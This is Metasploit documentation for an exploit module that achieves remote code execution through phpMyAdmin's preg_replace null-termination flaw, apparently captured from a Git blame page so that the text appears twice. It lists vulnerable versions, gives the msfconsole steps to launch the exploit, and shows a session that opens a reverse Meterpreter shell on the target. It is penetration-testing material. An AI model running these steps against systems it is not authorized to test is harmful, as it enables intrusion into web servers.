documentation/modules/exploit/multi/http/phpmyadmin_null_termination_exec.md

## Description

This module exploits a vulnerability in a PHP's `preg_replace()` function
that is used by phpMyAdmin's replace table feature.


## Vulnerable Application

PHP versions before 5.4.6 allow null termination of the `preg_replace` string parameter.

phpMyAdmin versions 4.6.x (prior to 4.6.3), 4.4.x versions (prior to 4.4.15.7),
and 4.0.x versions (prior to 4.0.10.16) are affected.


## Options

**DATABASE**
This option specifies the database the module will use
when creating a new table as part of the exploit.


## Verification Steps

- [ ] Install vulnerable phpMyAdmin application
- [ ] Create database through phpMyAdmin application
- [ ] `./msfconsole`
- [ ] `use exploit/multi/http/phpmyadmin_null_termination_exec`
- [ ] `set USERNAME <username>`
- [ ] `set PASSWORD <password>`
- [ ] `set DATABASE <database>`
- [ ] `set rhost <rhost>`
- [ ] `run`


## Scenarios

### Tested on Windows 7 x64 running phpMyAdmin 4.3.0 on PHP 5.3.8

```
msf5 > use exploit/multi/http/phpmyadmin_null_termination_exec
msf5 exploit(multi/http/phpmyadmin_null_termination_exec) > set rhost 172.22.222.122
rhost => 172.22.222.122
msf5 exploit(multi/http/phpmyadmin_null_termination_exec) > set database <database>
database => <database>
msf5 exploit(multi/http/phpmyadmin_null_termination_exec) > run

[*] Started reverse TCP handler on 172.22.222.177:4444 
[*] Sending stage (37775 bytes) to 172.22.222.122
[*] Sleeping before handling stage...
[*] Meterpreter session 2 opened (172.22.222.177:4444 -> 172.22.222.122:49169) at 2018-06-18 07:28:19 -0500
[-] 172.22.222.122:80 - Failed to remove the table 'spkkw'

meterpreter > sysinfo
Computer    : WIN-V438RLMESAE
OS          : Windows NT 6.1 build 7601 (Windows 7 Business Edition Service Pack 1) i586
Meterpreter : php/windows
```
Update module, Add docs 2018-06-18 07:33:05 -05:00			`## Description`

			This module exploits a vulnerability in a PHP's `preg_replace()` function
			`that is used by phpMyAdmin's replace table feature.`


			`## Vulnerable Application`

			PHP versions before 5.4.6 allow null termination of the `preg_replace` string parameter.

			`phpMyAdmin versions 4.6.x (prior to 4.6.3), 4.4.x versions (prior to 4.4.15.7),`
			`and 4.0.x versions (prior to 4.0.10.16) are affected.`


			`## Options`

			`DATABASE`
			`This option specifies the database the module will use`
			`when creating a new table as part of the exploit.`


			`## Verification Steps`

			`- [ ] Install vulnerable phpMyAdmin application`
			`- [ ] Create database through phpMyAdmin application`
			- [ ] `./msfconsole`
			- [ ] `use exploit/multi/http/phpmyadmin_null_termination_exec`
			- [ ] `set USERNAME <username>`
			- [ ] `set PASSWORD <password>`
			- [ ] `set DATABASE <database>`
			- [ ] `set rhost <rhost>`
			- [ ] `run`


			`## Scenarios`

			`### Tested on Windows 7 x64 running phpMyAdmin 4.3.0 on PHP 5.3.8`

			```
			`msf5 > use exploit/multi/http/phpmyadmin_null_termination_exec`
			`msf5 exploit(multi/http/phpmyadmin_null_termination_exec) > set rhost 172.22.222.122`
			`rhost => 172.22.222.122`
			`msf5 exploit(multi/http/phpmyadmin_null_termination_exec) > set database <database>`
Use Gem::Version 2018-06-18 08:35:47 -05:00			`database => <database>`
Update module, Add docs 2018-06-18 07:33:05 -05:00			`msf5 exploit(multi/http/phpmyadmin_null_termination_exec) > run`

			`[*] Started reverse TCP handler on 172.22.222.177:4444`
			`[*] Sending stage (37775 bytes) to 172.22.222.122`
			`[*] Sleeping before handling stage...`
			`[*] Meterpreter session 2 opened (172.22.222.177:4444 -> 172.22.222.122:49169) at 2018-06-18 07:28:19 -0500`
			`[-] 172.22.222.122:80 - Failed to remove the table 'spkkw'`

			`meterpreter > sysinfo`
			`Computer : WIN-V438RLMESAE`
			`OS : Windows NT 6.1 build 7601 (Windows 7 Business Edition Service Pack 1) i586`
			`Meterpreter : php/windows`
			```